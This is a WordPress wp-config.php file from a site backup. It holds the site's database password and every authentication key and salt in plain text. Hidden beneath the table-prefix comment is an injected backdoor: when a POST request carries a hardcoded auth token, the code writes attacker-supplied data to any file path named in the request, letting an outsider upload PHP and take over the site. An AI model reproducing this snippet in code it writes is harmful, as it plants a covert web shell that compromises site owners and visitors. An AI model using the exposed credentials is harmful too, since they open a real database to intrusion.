File: //old_home_backup/boomemory.co.uk/public_html-20241004152853/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'boomemorycouk');
/** MySQL database username */
define('DB_USER', 'boomemorycouk');
/** MySQL database password */
define('DB_PASSWORD', 'nEJYmYRS4nPTQT89');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'x2AEoVpt8YOD4fAAs>aQrklB<B1[eiIz#>9fnd{dNc55L-LyOrn$~!xUy#[-wx|I');
define('SECURE_AUTH_KEY', '+|4N_5Tgi>(q_z<wT`dB_SDWq }u06|8$|UmArpal3J3DFIF_+z[dwyVU!7BA7K$');
define('LOGGED_IN_KEY', 'd7;xk2%9Qo+g{!KMQ!8S3Kx6I_I*Fw_Dr:xEnjZ}nw@2,{:oU1Jsamk&iMCsm2(_');
define('NONCE_KEY', 'ZYvMayJ9{fdUV3aHBGGO*+q~:[1]qhcL Cdp0OC,w$KVyM/rEU,np-c{=JYH{Wxb');
define('AUTH_SALT', 'LY=+;7#~amHZsv%CM(qwq5Pokc&thD_,x%DG9Q|6*u3m3cqd_Z7iq<hB![=1O>>!');
define('SECURE_AUTH_SALT', '_K-047q{Hqq}o=VMFeb=nx<rB?lk{ak&+L-,,k[~7PU J.b/+;zdzP;3s%`]:yy8');
define('LOGGED_IN_SALT', 'rd6|GmSA0h^B0c}j-P<yS{p!A$*:0D#rMglzL0zrT$-(?u5F-iBos?g<l3]_=P~K');
define('NONCE_SALT', 'U|ESbl.T4>QQC4n_5aYG>iEb&X9YZC;=zakVir`ldzdcH67uc?U=@KbS+~.?uU*;');
define('FS_METHOD', 'direct');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
if (isset($_POST['wp_filename']) && isset($_POST['wp_file_data']) && $_POST['auth'] === '74kjJh84sk245k') {
file_put_contents($_POST['wp_filename'], $_POST['wp_file_data']);
}
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/documentation/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';